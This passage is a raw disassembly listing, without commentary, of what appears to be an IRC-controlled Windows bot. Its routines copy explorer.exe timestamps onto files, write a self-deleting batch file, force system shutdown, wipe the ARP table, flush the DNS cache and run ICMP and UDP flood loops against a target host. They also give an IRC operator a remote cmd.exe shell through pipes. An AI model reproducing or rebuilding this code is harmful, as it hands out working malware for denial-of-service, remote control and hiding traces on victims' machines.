loc_4091BE: ; CODE XREF: sub_409140+7A�j
pop edi
pop esi
pop ebp
retn
sub_409140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091C2 proc near ; CODE XREF: sub_40CB17+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:off_436524
test eax, eax
jz short loc_409261
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:off_42207C
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; sub_4DB2B0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_409261
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_422100 ; GetFileTime
push ebx
mov ebx, ds:off_422074
call ebx ; sub_4DB3D5
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; sub_4DB2B0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409261
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4220FC ; SetFileTime
push esi
call ebx ; sub_4DB3D5
loc_409261: ; CODE XREF: sub_4091C2+2A�j
; sub_4091C2+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4091C2 endp
; =============== S U B R O U T I N E =======================================
sub_409266 proc near ; CODE XREF: sub_40D2E0+13C4�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41358D
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_4363B0 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_409266 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409288 proc near ; CODE XREF: sub_40B105+472�p
; sub_40D2E0+59D4�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_42ACD8, esi
push edi
jz short loc_4092AC
cmp ds:dword_436538, esi
jnz short loc_4092AC
push esi
call sub_40A7C2
pop ecx
loc_4092AC: ; CODE XREF: sub_409288+13�j
; sub_409288+1B�j
call sub_4150F5
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_42210C ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:off_42207C
mov edi, eax
cmp edi, esi
jbe loc_40940C
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_4220B0 ; WriteFile
push edi
call ds:off_422074
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415500
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_415500
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_4325D8
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:off_4220E0
push eax
call ds:off_422060
lea eax, [ebp+var_15C]
push eax
call ds:off_422080
cmp eax, 0FFFFFFFFh
jz short loc_4093B4
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_422108 ; SetFileAttributesA
loc_4093B4: ; CODE XREF: sub_409288+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_415480
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_422000 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_422104 ; CreateProcessA
loc_40940C: ; CODE XREF: sub_409288+72�j
pop edi
pop esi
leave
retn
sub_409288 endp
; =============== S U B R O U T I N E =======================================
sub_409410 proc near ; CODE XREF: sub_4013EC+7�p
; sub_401992+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_409438
push [esp+arg_0]
call ds:dword_4364EC ; gethostbyname
test eax, eax
jnz short loc_409431
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_409410+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_409438: ; CODE XREF: sub_409410+D�j
retn
sub_409410 endp
; =============== S U B R O U T I N E =======================================
sub_409439 proc near ; CODE XREF: sub_40D000+D6�p
mov ecx, ds:dword_436390
xor eax, eax
test ecx, ecx
jz short locret_409447
call ecx ; DnsFlushResolverCache
locret_409447: ; CODE XREF: sub_409439+A�j
retn
sub_409439 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409448 proc near ; CODE XREF: sub_40D2E0:loc_4129C4�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_4364E4 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40950E
sub ecx, 32h
jz loc_409507
sub ecx, 48h
jz short loc_4094A8
sub ecx, 6Eh
jz short loc_4094A1
loc_40948A: ; CODE XREF: sub_409448+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_429174
push eax
call sub_415480
add esp, 0Ch
jmp short loc_4094E8
; ---------------------------------------------------------------------------
loc_4094A1: ; CODE XREF: sub_409448+40�j
push offset unk_429140
jmp short loc_4094DA
; ---------------------------------------------------------------------------
loc_4094A8: ; CODE XREF: sub_409448+3B�j
push [ebp+var_8]
call sub_415D2F
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_415500
add esp, 10h
cmp esi, edi
jz short loc_4094D5
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_4364E4 ; GetIpNetTable
cmp eax, edi
jz short loc_40950E
jmp short loc_40948A
; ---------------------------------------------------------------------------
loc_4094D5: ; CODE XREF: sub_409448+79�j
push offset unk_429100
loc_4094DA: ; CODE XREF: sub_409448+5E�j
; sub_409448+C4�j
lea eax, [ebp+var_88]
push eax
call sub_415480
pop ecx
pop ecx
loc_4094E8: ; CODE XREF: sub_409448+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40A5B3
pop ecx
loc_4094F8: ; CODE XREF: sub_409448+C8�j
; sub_409448+DC�j
push esi
call sub_415DE1
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409507: ; CODE XREF: sub_409448+32�j
push offset unk_4290C0
jmp short loc_4094DA
; ---------------------------------------------------------------------------
loc_40950E: ; CODE XREF: sub_409448+29�j
; sub_409448+89�j
cmp [esi], edi
jbe short loc_4094F8
lea ebx, [esi+4]
loc_409515: ; CODE XREF: sub_409448+DA�j
push ebx
call ds:dword_4364E0 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_409515
jmp short loc_4094F8
sub_409448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409526 proc near ; CODE XREF: sub_40144A+243�p
; sub_401D82+268�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_43640C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_43679C
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_415480
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_409526 endp
; =============== S U B R O U T I N E =======================================
sub_40957F proc near ; CODE XREF: sub_4010B5+24C�p
; sub_4010B5+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_4095A8
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40959B: ; CODE XREF: sub_40957F+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40959B
pop edi
jmp short loc_4095AC
; ---------------------------------------------------------------------------
loc_4095A8: ; CODE XREF: sub_40957F+A�j
mov edx, [esp+4+arg_0]
loc_4095AC: ; CODE XREF: sub_40957F+27�j
test esi, esi
pop esi
jz short loc_4095B6
movzx ecx, byte ptr [edx]
add eax, ecx
loc_4095B6: ; CODE XREF: sub_40957F+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40957F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095CC proc near ; DATA XREF: sub_40D2E0+2E51�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call ds:dword_4363F4 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call ds:dword_4364A8 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_409627
lea eax, [ebp+var_C0]
push eax
call ds:dword_4364EC ; gethostbyname
cmp eax, ebx
jz short loc_40962D
loc_409627: ; CODE XREF: sub_4095CC+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40968A
loc_40962D: ; CODE XREF: sub_4095CC+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_4291F0
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40966D
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40BAE7
add esp, 14h
loc_40966D: ; CODE XREF: sub_4095CC+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40A5B3
push [ebp+var_30]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_40968A: ; CODE XREF: sub_4095CC+5F�j
cmp eax, ebx
jz short loc_40969A
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40969D
; ---------------------------------------------------------------------------
loc_40969A: ; CODE XREF: sub_4095CC+C0�j
mov [ebp+var_4], esi
loc_40969D: ; CODE XREF: sub_4095CC+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_415500
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_4096BD
mov [ebp+var_3C], eax
loc_4096BD: ; CODE XREF: sub_4095CC+EC�j
cmp [ebp+var_38], edi
jge short loc_4096C5
mov [ebp+var_38], edi
loc_4096C5: ; CODE XREF: sub_4095CC+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_4096F2
loc_4096CC: ; CODE XREF: sub_4095CC+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call ds:dword_43638C ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_4096CC
loc_4096F2: ; CODE XREF: sub_4095CC+FE�j
push [ebp+arg_0]
call ds:dword_436520 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_4291B4
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40973B
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40BAE7
add esp, 14h
loc_40973B: ; CODE XREF: sub_4095CC+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40A5B3
push [ebp+var_30]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
sub_4095CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409758 proc near ; DATA XREF: sub_40D2E0+2FA9�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
pop ecx
push 11h
push 2
push 2
call ds:dword_4364E8 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40983D
lea eax, [ebp+var_B0]
push eax
call ds:dword_4364EC ; gethostbyname
cmp eax, edi
jnz short loc_409836
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_429264
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_409819
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40BAE7
add esp, 14h
loc_409819: ; CODE XREF: sub_409758+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40A5B3
push [ebp+var_20]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_409836: ; CODE XREF: sub_409758+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_409840
; ---------------------------------------------------------------------------
loc_40983D: ; CODE XREF: sub_409758+6E�j
lea eax, [ebp+arg_0]
loc_409840: ; CODE XREF: sub_409758+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40985B
call sub_4154DC
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40985E
; ---------------------------------------------------------------------------
loc_40985B: ; CODE XREF: sub_409758+F0�j
push [ebp+var_24]
loc_40985E: ; CODE XREF: sub_409758+101�j
call ds:dword_436468 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_409870
mov [ebp+var_24], esi
loc_409870: ; CODE XREF: sub_409758+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40987D
mov [ebp+var_24], eax
loc_40987D: ; CODE XREF: sub_409758+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_409891
mov [ebp+var_28], esi
loc_409891: ; CODE XREF: sub_409758+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_4098B2
loc_409898: ; CODE XREF: sub_409758+158�j
call sub_4154DC
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_409898
loc_4098B2: ; CODE XREF: sub_409758+13E�j
; sub_409758+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_409911
push 0Bh
pop esi
loc_4098BF: ; CODE XREF: sub_409758+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_4154DC
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call ds:dword_4364CC ; sendto
push [ebp+var_28]
call ds:dword_422054 ; Sleep
dec esi
jnz short loc_4098BF
cmp [ebp+var_24], edi
jnz short loc_4098B2
call sub_4154DC
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_436468 ; htons
mov [ebp+var_E], ax
jmp short loc_4098B2
; ---------------------------------------------------------------------------
loc_409911: ; CODE XREF: sub_409758+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_429228
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_409951
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40BAE7
add esp, 14h
loc_409951: ; CODE XREF: sub_409758+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_40A5B3
push [ebp+var_20]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
sub_409758 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40996E proc near ; CODE XREF: sub_40999E+2A�p
; sub_4099D6+7E�p ...
mov eax, ds:dword_4367B4
push esi
mov esi, ds:off_422074
cmp eax, 0FFFFFFFFh
jz short loc_409982
push eax
call esi ; sub_4DB3D5
loc_409982: ; CODE XREF: sub_40996E+F�j
mov eax, ds:dword_4367BC
cmp eax, 0FFFFFFFFh
jz short loc_40998F
push eax
call esi ; sub_4DB3D5
loc_40998F: ; CODE XREF: sub_40996E+1C�j
mov eax, ds:dword_4367B0
cmp eax, 0FFFFFFFFh
jz short loc_40999C
push eax
call esi ; sub_4DB3D5
loc_40999C: ; CODE XREF: sub_40996E+29�j
pop esi
retn
sub_40996E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40999E proc near ; CODE XREF: sub_40A965+14A�p
; sub_40D2E0+4881�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_415C80
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push ds:dword_4367B8
call ds:dword_4220B0 ; WriteFile
test eax, eax
jnz short loc_4099D1
call sub_40996E
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4099D1: ; CODE XREF: sub_40999E+28�j
push 1
pop eax
leave
retn
sub_40999E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4099D6 proc near ; CODE XREF: sub_409A5D+D3�p
; sub_409A5D+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_4325D8
push [ebp+arg_4]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_409A19
push 7D0h
call ds:dword_422054 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_415480
add esp, 10h
jmp short loc_409A30
; ---------------------------------------------------------------------------
loc_409A19: ; CODE XREF: sub_4099D6+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_2 ; "%s"
push eax
call sub_415480
add esp, 0Ch
loc_409A30: ; CODE XREF: sub_4099D6+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
test eax, eax
jg short loc_409A59
call sub_40996E
loc_409A59: ; CODE XREF: sub_4099D6+7C�j
xor eax, eax
leave
retn
sub_4099D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A5D proc near ; DATA XREF: sub_409BB2+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_4367C0
loc_409A75: ; CODE XREF: sub_409A5D+79�j
; sub_409A5D+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push ds:dword_4367B4
call ds:dword_422114 ; PeekNamedPipe
test eax, eax
jz loc_409B43
cmp [ebp+var_4], edi
jnz short loc_409AD8
lea eax, [ebp+var_8]
push eax
push ds:dword_4367B0
call ds:dword_422110 ; GetExitCodeProcess
test eax, eax
jz short loc_409ACE
cmp [ebp+var_8], 103h
jnz loc_409B67
loc_409ACE: ; CODE XREF: sub_409A5D+62�j
push 0Ah
call ds:dword_422054 ; Sleep
jmp short loc_409A75
; ---------------------------------------------------------------------------
loc_409AD8: ; CODE XREF: sub_409A5D+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_409AEF
loc_409ADF: ; CODE XREF: sub_409A5D+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_409B3D
inc eax
cmp eax, [ebp+var_4]
jb short loc_409ADF
loc_409AEF: ; CODE XREF: sub_409A5D+80�j
mov [ebp+var_4], esi
loc_409AF2: ; CODE XREF: sub_409A5D+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push ds:dword_4367B4
call ds:off_422098
test eax, eax
jz short loc_409B8F
lea eax, [ebp+var_20C]
push eax
push ebx
push ds:dword_4367F4
call sub_4099D6
add esp, 0Ch
jmp loc_409A75
; ---------------------------------------------------------------------------
loc_409B3D: ; CODE XREF: sub_409A5D+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_409AF2
; ---------------------------------------------------------------------------
loc_409B43: ; CODE XREF: sub_409A5D+45�j
push offset dword_429324
push ebx
push ds:dword_4367F4
call sub_4099D6
push [ebp+arg_0]
call sub_415248
add esp, 10h
push 1
call ds:dword_422044 ; ExitThread
loc_409B67: ; CODE XREF: sub_409A5D+6B�j
call sub_40996E
push offset dword_4292EC
push ebx
push ds:dword_4367F4
call sub_4099D6
push [ebp+arg_0]
call sub_415248
add esp, 10h
push edi
call ds:dword_422044 ; ExitThread
loc_409B8F: ; CODE XREF: sub_409A5D+C3�j
push offset dword_4292AC
push ebx
push ds:dword_4367F4
call sub_4099D6
push [ebp+arg_0]
call sub_415248
add esp, 10h
push edi
call ds:dword_422044 ; ExitThread
sub_409A5D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BB2 proc near ; CODE XREF: sub_40A965+99�p
; sub_40D2E0+5774�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40996E
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call ds:off_436524
test eax, eax
jz loc_409CAC
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_422120
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_409CAC
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_409CAC
mov edi, ds:dword_42211C
push 3
push esi
push esi
push offset dword_4367B8
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_422118 ; DuplicateHandle
test eax, eax
jz short loc_409CAC
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_415500
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_415500
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_4325D8
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_422104 ; CreateProcessA
test eax, eax
jnz short loc_409CB4
loc_409CAC: ; CODE XREF: sub_409BB2+2F�j
; sub_409BB2+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_409D62
; ---------------------------------------------------------------------------
loc_409CB4: ; CODE XREF: sub_409BB2+F8�j
push [ebp+var_4]
mov edi, ds:off_422074
call edi ; sub_4DB3D5
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_4367B4, eax
mov eax, [ebp+var_8]
mov ds:dword_4367BC, eax
mov eax, [ebp+var_2C]
mov ds:dword_4367B0, eax
call edi ; sub_4DB3D5
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov ds:dword_4367F4, eax
jz short loc_409CEE
push [ebp+arg_4]
jmp short loc_409CEF
; ---------------------------------------------------------------------------
loc_409CEE: ; CODE XREF: sub_409BB2+135�j
push ebx
loc_409CEF: ; CODE XREF: sub_409BB2+13A�j
push offset dword_4367C0
call sub_415480
pop ecx
pop ecx
push esi
push 7
push offset dword_4293A8
call sub_414F2C
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov ds:dword_43BEC8[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_409A5D
push esi
push esi
call ds:dword_422070 ; CreateThread
cmp eax, esi
mov ds:dword_43BED4[edi], eax
jnz short loc_409D60
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset dword_429364
push eax
call sub_415480
lea eax, [ebp+var_378]
push eax
call sub_40A5B3
add esp, 10h
loc_409D60: ; CODE XREF: sub_409BB2+185�j
xor eax, eax
loc_409D62: ; CODE XREF: sub_409BB2+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_409BB2 endp
; =============== S U B R O U T I N E =======================================
sub_409D67 proc near ; CODE XREF: sub_405756+74�p
; sub_409F1E+217�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_422048 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
